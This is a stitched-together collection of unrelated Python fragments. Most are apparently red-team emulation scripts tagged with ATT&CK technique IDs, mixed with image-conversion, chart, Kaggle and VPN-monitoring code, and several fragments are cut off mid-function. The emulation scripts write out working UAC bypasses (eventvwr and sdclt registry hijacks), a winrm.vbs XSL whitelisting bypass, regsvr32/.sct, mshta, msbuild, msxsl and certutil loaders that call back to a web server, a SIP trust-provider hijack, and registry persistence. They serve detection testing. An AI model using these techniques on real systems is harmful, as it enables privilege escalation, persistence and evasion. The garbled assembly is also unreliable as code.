def main():
common.log("winrm.vbs executing a backdoor")
xslpath = common.get_path('bin','WsmPty.xsl')
xslpath2 = common.get_path('bin','WsmTxt.xsl')
targetdir = "%SystemDrive%\BypassDir\cscript.exe"
cscriptName = "winword.exe" #"winword.exe" # "cscript.exe"
common.execute(["cmd.exe","/C","mkdir","%s" % targetdir ])
common.execute(["cmd.exe","/C","copy", "%windir%\System32\cscript.exe","%s\%s" % (targetdir,cscriptName)])
common.execute(["cmd.exe","/C","copy", xslpath, targetdir])
common.execute(["cmd.exe","/C","copy", xslpath2, targetdir])
common.execute( 'cmd.exe /C %s\%s //nologo %%windir%%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty' % (targetdir,cscriptName))
common.execute( 'cmd.exe /C %s\%s //nologo %%windir%%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:"pretty"' % (targetdir,cscriptName))
common.execute( 'cmd.exe /C %s\%s //nologo %%windir%%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 /format:pretty' % (targetdir,cscriptName))
common.execute( 'cmd.exe /C %s\%s //nologo %%windir%%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 /format:"pretty"' % (targetdir,cscriptName))
common.execute( 'cmd.exe /C %s\%s //nologo %%windir%%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:text' % (targetdir,cscriptName))
common.execute( 'cmd.exe /C %s\%s //nologo %%windir%%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:"text"' % (targetdir,cscriptName))
common.execute( 'cmd.exe /C %s\%s //nologo %%windir%%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 /format:text' % (targetdir,cscriptName))
common.execute( 'cmd.exe /C %s\%s //nologo %%windir%%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 /format:"text"' % (targetdir,cscriptName))
time.sleep(10)
common.log("Killing all calc to cleanup", "-")
common.execute(["taskkill", "/f", "/im", "calculator.exe"])
common.log("Removing old files all calc to cleanup", "-")
common.execute(["cmd.exe","/C","rd", "/s", "/q", targetdir])
def mouse_script_item( srcid, val, images_dct ):
anim = val.split(":")
a = anim[0]
b = anim[1]
if (b=="show"):
nm = a
info = images_dct.has_key(nm)
fpath = os.path.join( info['path'], info['filename'] )
fpath = common.path_replace(fpath)
fpath = common.get_path( fpath )
script = "document.getElementById('%s').style.visibility='visible';document.getElementById('%s').src='%s'" % (nm,nm,fpath)
return script
elif ( b=="hide"):
nm = a
script = "document.getElementById('%s').style.visibility='hidden';" % nm
return script
elif ( b=="replace" ):
nm = a
info = images_dct[nm][0]
fpath = os.path.join( info['path'], info['filename'] )
fpath = common.path_replace( fpath )
script = "document.getElementById('%s').style.visibility='visible';document.getElementById('%s').src='%s'" % (srcid,srcid,fpath)
return script
else:
print "WARNING: Nothing for mouse script item"
return ""
def gen_charts(prs, num):
for i in range(2, num + 2, 1):
EMPTY_LAYOUT = prs.slide_layouts[EMPTY_LAYOUT_NUM]
slide = prs.slides.add_slide(EMPTY_LAYOUT)
title = slide.shapes.title
title.text = "PCIE Test " + str(i - 1)
slide.shapes.add_picture(
get_path("\\outputs\\img\\" + str(i) + ".png"), Inches(2),
Inches(2))
def run_ensamble():
ensemble_file = get_path(
) + 'data/submission/ensamble/mpnn_ensemble_all_good.csv'
df_test = pd.read_csv(get_data_path() + 'test.csv')
df_test = df_test.sort_values(by=['id'])
test_id = df_test.id.values
test_type = df_test.type.values
num_test = len(test_id)
coupling_count = np.zeros(num_test)
coupling_value = np.zeros(num_test)
# best local cv:
# 0.000020 228.5* 85.7 | -1.130, -1.981, -1.651, -1.140, -2.251, -2.310, -2.133, -1.777 | -1.694 0.18 -1.80 | -2.058 | 3 hr 15 min
# 0.00008 237.5* 47.5 | -1.178, -1.935, -1.590, +0.000, +0.000, +0.000, +0.000, +0.000 | -1.596 0.22 -1.57 | -1.559 | 0 hr 36 min
subs = [
(['2JHC', '3JHC', '1JHN', '2JHN', '3JHN', '2JHH', '3JHH'], get_path() +
'data/submission/all_types/submit/sagpooling_larger_mpnn-175.csv'),
(['1JHC', '2JHC', '3JHC'], get_path() +
'data/submission/all_JHC/submit/submit-00237500_model-larger.csv'),
(['1JHC', '2JHC', '3JHC', '1JHN', '2JHN', '3JHN', '2JHH',
'3JHH'], get_path() +
'data/submission/all_types_yukawa_radius_set2set/submit/set2set_highbs_mpnn_larger.csv'
)
]
for valid_type, f in subs:
df = pd.read_csv(f)
df = df.sort_values(by=['id'])
for t in valid_type:
index = np.where(test_type == t)[0]
coupling_value[index] += df.scalar_coupling_constant.values[index]
coupling_count[index] += 1
coupling_value = coupling_value / coupling_count
df = pd.DataFrame(list(zip(test_id, coupling_value)),
columns=['id', 'scalar_coupling_constant'])
df.to_csv(ensemble_file, index=False)
def analysis(directory: str = "./zip",
aggregate=False,
clusters_count=2,
key_file="keys.csv",
res_file="res.xlsx"):
""" 对所有的 zip 文件进行分析,输出为到 res.xlsx 文件中"""
if aggregate:
aggregate_files(directory, key_file)
file_path = get_path("keys.csv")
groups = group(file_path, clusters_count=clusters_count)
write_excel(groups, res_file)
return True
def main(target_file=common.get_path("bin", "myapp.exe")):
common.log("Bypass UAC with %s" % target_file)
common.log("Writing registry key")
hkey = winreg.CreateKey(winreg.HKEY_CURRENT_USER, "Software\\Classes\\MSCFile\\shell\\open\\command")
winreg.SetValue(hkey, "", winreg.REG_SZ, target_file)
common.log("Running event viewer")
common.execute(["c:\\windows\\system32\\eventvwr.exe"])
common.log("Restoring registry key", log_type="-")
winreg.DeleteValue(hkey, "")
winreg.DeleteKey(hkey, "")
winreg.CloseKey(hkey)
def main():
common.log("MsBuild Beacon")
server, ip, port = common.serve_web()
common.clear_web_cache()
common.log("Updating the callback http://%s:%d" % (ip, port))
target_task = "tmp-file.csproj"
common.copy_file(common.get_path("bin", "BadTasks.csproj"), target_task)
new_callback = "http://%s:%d" % (ip, port)
common.patch_regex(target_task, common.CALLBACK_REGEX, new_callback)
common.execute([MS_BUILD, target_task])
common.remove_file(target_task)
server.shutdown()
def gen_summary(prs, summary):
EMPTY_LAYOUT = prs.slide_layouts[EMPTY_LAYOUT_NUM]
slide = prs.slides.add_slide(EMPTY_LAYOUT)
title = slide.shapes.title
title.text = "PCIE Test Summary"
x, y, cx, cy = Inches(4), Inches(1), Inches(2), Inches(1)
shape = slide.shapes.add_table(2, 2, x, y, cx, cy)
table = shape.table
table.cell(0, 0).text = 'Pass'
table.cell(0, 1).text = 'Fail'
table.cell(1, 0).text = str(summary.pass_count)
table.cell(1, 1).text = str(summary.fail_count)
slide.shapes.add_picture(get_path("\\outputs\\img\\1.png"), Inches(2),
Inches(3))
def main(target_program=common.get_path("bin", "myapp.exe")):
common.log("Processes in Unusual Paths")
if not common.check_dependencies(target_program):
return common.MISSING_DEPENDENCIES
# user tmp
directories = ["C:\\Windows\\system32\\wbem"]
for directory in directories:
exists = os.path.exists(directory)
if not exists:
os.mkdir(directory)
run_from_directory(target_program, directory)
if not exists:
os.rmdir(directory)
def main():
# make sure path is absolute for psexec
status = common.run_system()
if status is not None:
return status
common.log("Run a user-writeable file as system")
source_path = common.get_path("bin", "myapp.exe")
target_directory = "c:\\users\\fake_user_rta-%d" % os.getpid()
if not os.path.exists(target_directory):
os.makedirs(target_directory)
target_path = os.path.join(target_directory, "user_file.exe")
common.copy_file(source_path, target_path)
common.execute(target_path)
common.remove_directory(target_directory)
def main(target_process=common.get_path("bin", "myapp.exe")):
target_process = os.path.abspath(target_process)
common.log("Bypass UAC via Sdclt to run %s" % target_process)
hkey = winreg.CreateKey(
winreg.HKEY_CURRENT_USER,
"Software\\Classes\\exefile\\shell\\runas\\command")
key_name = "IsolatedCommand"
common.log("Setting %s registry key" % key_name)
winreg.SetValueEx(hkey, key_name, 0, winreg.REG_SZ, target_process)
common.log("Running Sdclt to bypass UAC")
common.execute([r"c:\windows\system32\sdclt.exe", "/KickOffElev"])
common.log("Clearing registry keys", log_type="-")
winreg.DeleteValue(hkey, "IsolatedCommand")
winreg.DeleteKey(hkey, "")
winreg.CloseKey(hkey)
def analysis(
directory: str = './zip',
aggregate=False,
clusters_count=2,
file_count: int = 10,
calc_times: bool = False,
key_file='keys.csv',
res_file='res.xlsx',
):
""" 对所有的 zip 文件进行分析,输出为到 res.xlsx 文件中"""
if aggregate:
aggregate_files(directory, key_file)
file_path = get_path('keys.csv')
groups = group(file_path, clusters_count=clusters_count, calc_times=calc_times)
if file_count > clusters_count:
file_count = clusters_count
each = clusters_count // file_count
for i in range(file_count):
subgroup = {t: groups.get(t) for t in range(i * each, (i + 1) * each)}
write_excel(subgroup, f'res/{i + 1}_{res_file}')
return True
def main():
status = common.run_system()
if status is not None:
return status
common.log("System Restore Process Evasion")
program_path = common.get_path("bin", "myapp.exe")
common.log("Finding a writeable directory in %s" % SYSTEM_RESTORE)
target_directory = common.find_writeable_directory(SYSTEM_RESTORE)
if not target_directory:
common.log("No writeable directories in System Restore. Exiting...",
"-")
return common.UNSUPPORTED_RTA
target_path = os.path.join(target_directory, "restore-process.exe")
common.copy_file(program_path, target_path)
common.execute(target_path)
common.log("Cleanup", log_type="-")
common.remove_file(target_path)
def aggregation(path):
path_files = common.get_path(path)
print('Start filtering and aggregation:')
for path in tqdm(path_files):
df = pd.read_csv(path)
filename = common.get_filename(path)
logging.debug(f"File {filename} start fitering and aggreagation")
df = filter_data(df)
# Create date-hour colomn
df['date_hour'] = [
datetime(item.year, item.month, item.day, item.hour)
for item in df.tpep_pickup_datetime
]
# Group by on date_hour and region
data_group = df.groupby(['date_hour',
'region']).size().reset_index(name='count')
data_group.to_csv('data_aggregation/' + filename + '.csv')
logging.debug(f"File {filename} is ready \n")
# Name: Persistent Scripts
# RTA: persistent_scripts.py
# ATT&CK: T1064 (Scripting), T1086 (PowerShell)
import common
import os
import time
VBS = common.get_path("bin", "persistent_script.vbs")
NAME = "rta-vbs-persistence"
@common.dependencies(common.PS_EXEC, VBS)
def main():
common.log("Persistent Scripts")
if common.check_system():
common.log("Must be run as a non-SYSTEM user", log_type="!")
return 1
# Remove any existing profiles
user_profile = os.environ['USERPROFILE']
log_file = os.path.join(user_profile, NAME + ".log")
# Remove log file if exists
common.remove_file(log_file)
common.log("Running VBS")
common.execute(["cscript.exe", VBS])
# Let the script establish persistence, then read the log file back
# TODO: close this
else:
output = sys.stdout
output.write("#pragma warning disable 0108\n"); # disable "'member1' hides inherited member 'member2'. Use the new keyword if hiding was intended."
def get_classes(dn):
classes = []
classes.extend(dn.root.children(child_type=uml.Class))
import collections
q = collections.deque()
q.extend(dn.root.children(child_type=uml.Namespace))
while q:
namespace = q.pop()
q.extend(namespace.children(child_type=uml.Namespace))
classes.extend(namespace.children(child_type=uml.Class))
return classes
for child in get_classes(dn):
searchList = {'c': child, 'namespace': common.interface_namespace + common.get_path(child.parent), 'uml': uml, 'diagram_name': dn.root.name}
t = get_template("Interface", searchList=[searchList])
output.write(str(t))
searchList = {'c': child, 'namespace': common.impl_namespace + common.get_path(child.parent), 'uml': uml, 'diagram_name': dn.root.name, 'root': dn.root}
t = get_template("Implementation", searchList=[searchList])
output.write(str(t))
searchList = {'root': dn.root}
t = get_template("Initialize", searchList=[searchList])
output.write(str(t))
# Name: Microsoft HTA tool (mshta.exe) with Network Callback
# RTA: mshta_network.py
# ATT&CK: T1170
# Description: Generates network traffic from mshta.exe
import common
HTA_FILE = common.get_path("bin", "beacon.hta")
@common.dependencies(HTA_FILE)
def main():
# http server will terminate on main thread exit
# if daemon is True
common.log("MsHta Beacon")
server, ip, port = common.serve_web()
common.clear_web_cache()
new_callback = "http://%s:%d" % (ip, port)
common.log("Updating the callback to %s" % new_callback)
common.patch_regex(HTA_FILE, common.CALLBACK_REGEX, new_callback)
mshta = 'mshta.exe'
common.execute([mshta, HTA_FILE], timeout=10, kill=True)
server.shutdown()
if __name__ == "__main__":
exit(main())
# Name: Registry persistence creation
# rta: registry_persistence_create.py
# ATT&CK: T1015, T1103
# Description: Creates registry persistence for mock malware in Run and RunOnce keys, Services and debuggers.
import winreg
import time
import common
TARGET_APP = common.get_path("bin", "myapp.exe")
def pause():
time.sleep(0.5)
def write_reg_string(hive, key, value, data, delete=True):
hkey = winreg.CreateKey(hive, key)
key = key.rstrip('\\')
common.log("Writing to registry %s\\%s -> %s" % (key, value, data))
winreg.SetValueEx(hkey, value, 0, winreg.REG_SZ, data)
stored, code = winreg.QueryValueEx(hkey, value)
if data != stored:
common.log("Wrote %s but retrieved %s" % (data, stored), log_type="-")
if delete:
pause()
common.log("Removing %s\\%s" % (key, value), log_type="-")
winreg.DeleteValue(hkey, value)
hkey.Close()
# Name: msxsl.exe Network
# RTA: msxsl_network.py
# ATT&CK: T1127
# Description: Generates network traffic from msxsl.exe
import common
MS_XSL = common.get_path("bin", "msxsl.exe")
XML_FILE = common.get_path("bin", "customers.xml")
XSL_FILE = common.get_path("bin", "cscript.xsl")
@common.dependencies(MS_XSL, XML_FILE, XSL_FILE)
def main():
common.log("MsXsl Beacon")
server, ip, port = common.serve_web()
common.clear_web_cache()
new_callback = "http://%s:%d" % (ip, port)
common.log("Updating the callback to %s" % new_callback)
common.patch_regex(XSL_FILE, common.CALLBACK_REGEX, new_callback)
common.execute([MS_XSL, XML_FILE, XSL_FILE])
server.shutdown()
if __name__ == "__main__":
exit(main())
import sys
sys.path.append("..")
import time
import datetime
from common import get_path, config, redis_utils, mysql_utils, sms_sender
from logger import logger
_logger = logger(get_path("logs//parser.log"))
server_internal_failure_msg = u"%s:%s 已经下架 原因:服务器在线人数为0或访问不了youbube 时间:%s"
ssh_connection_failure_msg = u"%s:%s 已经下架 原因:ssh连接失败或超时 时间:%s"
class Runner:
def __init__(self):
self.redis_util = redis_utils()
self.result = []
self.threshold = (config.getint("default", "period") * 60 *
config.getfloat("default", "conn_failure_rate") /
config.getint("default", "frequency"))
self.fail_num = 0
self.initialize_data()
_logger.logger.info(self.threshold)
def cal_total_vpn_line(self):
return int(
mysql_utils(config["mysql"]["mysql_host"],
_logger).get_all_server()[0][0])
# Name: Network Traffic from InstallUtil
# RTA: installutil_network.py
# ATT&CK: T1118
# Description: Uses mock .NET malware and InstallUtil to create network activity from InstallUtil.
import common
import sys
import os
MY_DOT_NET = common.get_path("bin", "mydotnet.exe")
@common.dependencies(MY_DOT_NET)
def main():
server, ip, port = common.serve_web()
common.clear_web_cache()
target_app = "mydotnet.exe"
common.patch_file(MY_DOT_NET,
common.wchar(":8000"),
common.wchar(":%d" % port),
target_file=target_app)
install_util64 = "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe"
install_util86 = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe"
fallback = False
if os.path.exists(install_util64):
install_util = install_util64
elif os.path.exists(install_util86):
install_util = install_util86
import win32com.client
import sys
from PIL import ImageGrab
import os
from common import get_path
SRC_FILE = get_path("\\outputs\\Result.xlsx")
IMAGE_PATH = get_path("\\outputs\\img\\")
def store_excel_charts(summary):
# os.mkdir(IMAGE_PATH)
o = win32com.client.Dispatch("Excel.Application")
o.Visible = 0
o.DisplayAlerts = 0
wb = o.Workbooks.Open(SRC_FILE)
try:
page_number = wb.Sheets.Count
for i in range(1, page_number + 1):
sheet = o.Sheets(i)
for n, chart in enumerate(sheet.Shapes):
chart.Copy()
image = ImageGrab.grabclipboard()
image.save(IMAGE_PATH + str(i) +'.png', 'png')
pass
pass
except:
print("Unexpected error:", sys.exc_info()[0])
print('** Error: Chart to Image Failed')
wb.Close(True)
o.Quit()
import sys
sys.path.append("..")
import time, datetime
import threading
import paramiko, socket
from logger import logger
from common import get_path, config, redis_utils
_logger = logger(
get_path("logs//runner_%s.log" % config["default"]["robot_order"]))
class Task:
def __init__(self):
self.ssh_pass = config["vpn_server"]["ssh_pwd"]
self.ssh_user = config["vpn_server"]["ssh_user"]
self.ssh_port = config["vpn_server"]["ssh_port"]
self.redis_util = redis_utils()
self.result = {}
def check(self, region, ip, status):
try:
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(
ip,
self.ssh_port,
self.ssh_user,
self.ssh_pass,
# Name: winrm.vbs Backdoor with .xsl Files
# rta: squiblyfoo.py
# ATT&CK:
# Description: downloads a xsl file executing commands using the signed winrm.vbs script
# References: https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404
import common
import os
import time
@common.dependencies(common.get_path("bin", "WsmPty.xsl"))
def main():
common.log("winrm.vbs executing a backdoor")
xslpath = common.get_path('bin','WsmPty.xsl')
xslpath2 = common.get_path('bin','WsmTxt.xsl')
targetdir = "%SystemDrive%\BypassDir\cscript.exe"
cscriptName = "winword.exe" #"winword.exe" # "cscript.exe"
common.execute(["cmd.exe","/C","mkdir","%s" % targetdir ])
common.execute(["cmd.exe","/C","copy", "%windir%\System32\cscript.exe","%s\%s" % (targetdir,cscriptName)])
common.execute(["cmd.exe","/C","copy", xslpath, targetdir])
common.execute(["cmd.exe","/C","copy", xslpath2, targetdir])
common.execute( 'cmd.exe /C %s\%s //nologo %%windir%%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty' % (targetdir,cscriptName))
common.execute( 'cmd.exe /C %s\%s //nologo %%windir%%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:"pretty"' % (targetdir,cscriptName))
common.execute( 'cmd.exe /C %s\%s //nologo %%windir%%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 /format:pretty' % (targetdir,cscriptName))
common.execute( 'cmd.exe /C %s\%s //nologo %%windir%%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 /format:"pretty"' % (targetdir,cscriptName))
common.execute( 'cmd.exe /C %s\%s //nologo %%windir%%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:text' % (targetdir,cscriptName))
common.execute( 'cmd.exe /C %s\%s //nologo %%windir%%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:"text"' % (targetdir,cscriptName))
common.execute( 'cmd.exe /C %s\%s //nologo %%windir%%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 /format:text' % (targetdir,cscriptName))
import sys
sys.path.append("..")
import time, datetime
from logger import logger
from common import get_path, config, redis_utils, mysql_utils
_logger = logger(get_path("logs//vpn_info.log"))
class update_vpn_list:
def __init__(self):
self.redis_util = redis_utils()
def update_vpn_info(self):
result = mysql_utils(config["mysql"]["mysql_host"],
_logger).get_server_info()
robot_num = config.getint("default", "total_robot_num")
if result:
avg_ip_num = int(len(result) / robot_num)
for _index in range(1, robot_num + 1):
_start = avg_ip_num * (_index - 1)
_end = avg_ip_num * _index
if _index >= robot_num:
self.redis_util.set_redis_key(
"%s_%s" % (config["redis"]["prefix_vpn_key"], _index),
result[_start:],
)
# Name: RegSvr32 Backdoor with .sct Files
# rta: regsvr32_scrobj.py
# ATT&CK: T1121, T1117, T1064
# Description: Loads a .sct network callback with RegSvr32
import common
@common.dependencies(common.get_path("bin", "notepad.sct"))
def main():
common.log("RegSvr32 with .sct backdoor")
server, ip, port = common.serve_web()
common.clear_web_cache()
uri = 'bin/notepad.sct'
url = 'http://%s:%d/%s' % (ip, port, uri)
common.execute(
["regsvr32.exe", "/u", "/n", "/s",
"/i:%s" % url, "scrobj.dll"])
common.log("Killing all notepads to cleanup", "-")
common.execute(["taskkill", "/f", "/im", "notepad.exe"])
server.shutdown()
if __name__ == "__main__":
exit(main())
import common
input_file = "sample1.png"
input_path = common.get_path(__file__, input_file)
output_file = "output.jpg"
output_path = common.get_path(__file__, output_file)
format = "jpg"
newWidth = 200
newHeight = 200
# invoke Aspose.Imaging Cloud SDK API to perform format change operation without using cloud storage
response = common.imagingApi.PostChangeImageScale(format, newWidth, newHeight, file=input_path)
if response.Status == 'OK':
# download image from API response
with open(output_path, 'wb') as f:
for chunk in response.InputStream:
f.write(chunk)
import common
input_file = "sample1.png"
input_path = common.get_path(__file__, input_file)
output_file = "output.jpg"
output_path = common.get_path(__file__, output_file)
format = "jpg"
# invoke Aspose.Imaging Cloud SDK API to perform format change operation without using cloud storage
response = common.imagingApi.PostImageSaveAs(format, file=input_path)
if response.Status == 'OK':
# download image from API response
with open(output_path, 'wb') as f:
for chunk in response.InputStream:
f.write(chunk)
# Name: RunDll32 with .inf Callback
# rta: rundll32_inf_callback.py
# ATT&CK: T1105
# Description: Loads RunDll32 with a suspicious .inf file that makes a local http GET
import time
import common
INF_FILE = common.get_path("bin", "script_launch.inf")
@common.dependencies(INF_FILE)
def main():
# http server will terminate on main thread exit
# if daemon is True
common.log("RunDLL32 with Script Object and Network Callback")
server, ip, port = common.serve_web()
callback = "http://%s:%d" % (ip, port)
common.clear_web_cache()
common.patch_regex(INF_FILE, common.CALLBACK_REGEX, callback)
rundll32 = "rundll32.exe"
dll_entrypoint = "setupapi.dll,InstallHinfSection"
common.execute(
[rundll32, dll_entrypoint, "DefaultInstall", "128", INF_FILE],
shell=False)
time.sleep(1)
common.log("Cleanup", log_type="-")
common.execute("taskkill /f /im notepad.exe")
winreg.SetValueEx(hKey, "Dll", 0, winreg.REG_SZ, dll_path)
common.log("Setting verify function name: %s" % verify_function)
winreg.SetValueEx(hKey, "FuncName", 0, winreg.REG_SZ, verify_function)
hKey = winreg.CreateKey(winreg.HKEY_LOCAL_MACHINE, GETSIG_KEY)
common.log("Setting getsig dll path: %s" % dll_path)
winreg.SetValueEx(hKey, "Dll", 0, winreg.REG_SZ, dll_path)
common.log("Setting getsig function name: %s" % getsig_function)
winreg.SetValueEx(hKey, "FuncName", 0, winreg.REG_SZ, getsig_function)
if common.is_64bit():
SIGCHECK = common.get_path("bin", "sigcheck64.exe")
TRUST_PROVIDER_DLL = common.get_path("bin", "TrustProvider64.dll")
else:
SIGCHECK = common.get_path("bin", "sigcheck.exe")
TRUST_PROVIDER_DLL = common.get_path("bin", "TrustProvider32.dll")
TARGET_APP = common.get_path("bin", "myapp.exe")
@common.dependencies(SIGCHECK, TRUST_PROVIDER_DLL, TARGET_APP)
def main():
common.log("Registering SIP provider")
register_sip_provider(TRUST_PROVIDER_DLL, "VerifyFunction", "GetSignature")
common.log("Launching sigcheck")
common.execute([SIGCHECK, "-accepteula", TARGET_APP])
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
from common import get_path
if os.path.exists(get_path("site-packages.zip")):
DEBUG = True
else:
DEBUG = False
TEMPLATE_DEBUG = DEBUG
ADMINS = (
('evilbeast', '*****@*****.**'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
# Name: Downloading Files With Certutil
# RTA: certutil_webrequest.py
# ATT&CK: T1105
# Description: Uses certutil.exe to download a file.
import common
MY_DLL = common.get_path("bin", "mydll.dll")
@common.dependencies(MY_DLL)
def main():
# http server will terminate on main thread exit
# if daemon is True
server, ip, port = common.serve_web()
uri = "bin/mydll.dll"
target_file = "mydll.dll"
common.clear_web_cache()
url = "http://{ip}:{port}/{uri}".format(ip=ip, port=port, uri=uri)
common.execute(
["certutil.exe", "-urlcache", "-split", "-f", url, target_file])
server.shutdown()
common.remove_file(target_file)
if __name__ == "__main__":
exit(main())
# Where the magic happens
import common
if __name__ == '__main__':
# Grab the command line args and calculated verbosity
(args, verbosity) = common.parse_args()
# Set up the fancy logger, with optional file logging
common.configure_logger(verbosity, args.logfile)
# We're calling this a lot, so let's make it shorter
logger = common.logger
# And let's load the config file into common-space
common.load_configuration(args.configfile)
# For simplicity, shift to the repo root
path = common.get_path()
chdir(path)
# Load checks and actions into the common-space
# Sources are loaded by the checks themselves
# Likewise, filters are loaded by actions
common.get_thing('checks', common.checks)
common.get_thing('actions', common.actions)
while True:
messages = []
now = common.now(update=True)
for check in common.checks:
if check.last_check + check.interval < now:
for name, source in check.sources.items():
if source.last_check < now: